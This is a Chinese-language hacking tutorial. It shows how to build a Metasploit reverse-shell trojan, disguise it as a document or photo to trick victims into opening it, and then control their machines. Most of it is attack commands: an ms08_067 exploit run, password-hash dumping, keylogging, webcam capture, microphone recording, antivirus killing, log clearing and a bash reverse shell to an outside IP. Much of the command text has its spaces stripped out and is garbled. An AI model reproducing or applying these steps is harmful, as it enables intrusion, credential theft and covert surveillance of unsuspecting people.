exploit入侵电脑实践 MS17

入侵电脑(皆可)

需要的工具：(kali里面有)

-=本地=本地端口号–fexe–o文件名.exe

-==6666-fexe-oxss.exe

msfvenom-pandroid/meterpreter/reverse_tcpLHOST=172.16.60.144LPORT=8888Rtest.apk

即生成一个后门文件xss.exe

然后继续执行命令：

msfconsole

(运行msfconsole)

msfuseexploit/multi/handler(选择模块)

输入命令showpayloads会显示出有效的攻击载荷，比如shell_reverse_tcp。

msfexploit(handler)setpayloadwindows/meterpreter/reverse_tcp

setlhost加ip地址

setlport加端口号

msfexploit(handler)exploit-z-j（后台执行）

这样木马就配置好了，然后发给别人（可以伪造成文档,照片,软件等文件骗取别人打开）

发给别人后，等待别人打开xss.exe,打开即上钩了

msfexploit(handler)sessions（查看上钩的用户）

msfexploit(handler)sessions-i1（选择需要攻击的用户，这里选择第1个）

进入meterpreter了，即可进行一些相关的木马操作。

background：这个命令是将当前的session放到后台运行，可以在msf中继续其他渗透任务；

sessions：这个命令需要配合上面的background使用，该命令是将后台的会话打开，进行会话操作。

clearev：该命令是用来清除渗透的登录信息的，这个很有用。

hashdump：该命令是一个post模块，需要配合meterpreter使用，这个命令是用来获取目标系统的哈希值的

meterpreterrunpost/windows/gather/hashdump

migrate：这个也是一个post模块。可以将meterpreter当前的进程移动到其他指定的进程中，这样做的好处是可以给meterpreter一个相对稳定的运行环境，同时可以很好的躲避杀软。

meterpreterrunpost/windows/manage/migrate

webcam_list：列举摄像头。

webcam_snap：通过远程连接目标系统的摄像头。

runkillav：关闭对方的杀软，其实关闭杀软也可以进入cmd中手动关闭。

meterpreter

meterpreter是更高级的payload。

纯内存工作模式(不写硬盘)，避免被电子取证；加密的通信协议，对传输过程进行加密；易于扩展。

基本命令

msfuseexploit/windows/smb/ms08_067_netapimsfexploit(ms08_067_netapi)setrhost192.168.80.148msfexploit(ms08_067_netapi)setpayloadwindows/meterpreter/reverse_tcpmsfexploit(ms08_067_netapi)setlhost192.168.80.163msfexploit(ms08_067_netapi)exploit-jmsfexploit(ms08_067_netapi)sessions-i1进入meterpreter类型的shellmeterpreterbackground退出到msf命令提示符下meterpreterlpwd等价于在kali上输入pwdmeterpreterlcd/etc等价于在kali上输入cd/etcmeterpreterrunpost/windows/gather/smart_hashdump获取目标主机上用户的hash值meterpreterrunpost/windows/capture/keylog_recorder键盘记录meterpreterrunkillav结束目标主机上的杀毒软件相关进程meterpreterclearev清除系统日志meterpreterdownloadboot.ini下载目标主机上的boot.ini文件meterpreterupload/usr/share/windows-binaries/nc.exec:\\windows\\system32上传nc.exe到目标主机上。(注意要使用2个反斜杠)meterpreterdirwindows\\system32\

c.exemeterpreterexecute-fnc-nvlp3333执行nc.exemeterpreterexecute-fbash-i/dev/tcp/104.199.1.1/8201meterpreterexecute-fbash-i-Hmeterpreterexecute-fcmd.exe-i-H获得目标主机的shell，-i交互模式，-H隐藏meterpreterexecute-H-m-dcalc.exe-fwce32.exe-a-ofoo.txtmeterpretercatfoo.txt-m直接从内存中执行攻击端的可执行文件，不在硬盘存储，所以不会留下痕迹，且能避开杀毒软件的查杀；-d设置需要显示的进程名，可以避开敏感人士的检查。meterpretergetuid查看当前用户meterpretergetsystem提权到system用户meterpretergetprivs查看当前用户具有的权限meterpretergetpid查看meterpreter注入到了什么进程中meterpretermigrate1436更改到pid1436进程中meterpretergetpid重新使用getpid命令查看meterpreterhashdump获取目标主机上用户的hash值meterpretersysinfo查看目标系统的信息meterpreterkill188结束188进程meterpretershell获取目标操作系统的shellmeterpreteridletime查看目标主机已经空闲了多长时间meterpretereditC:\\Windows\\System32\\drivers\\etc\\hosts编辑hosts文件meterpreterrecord_mic-d10-f/root/桌面/1.mp4监听麦克风meterpreterloadpython加载python插件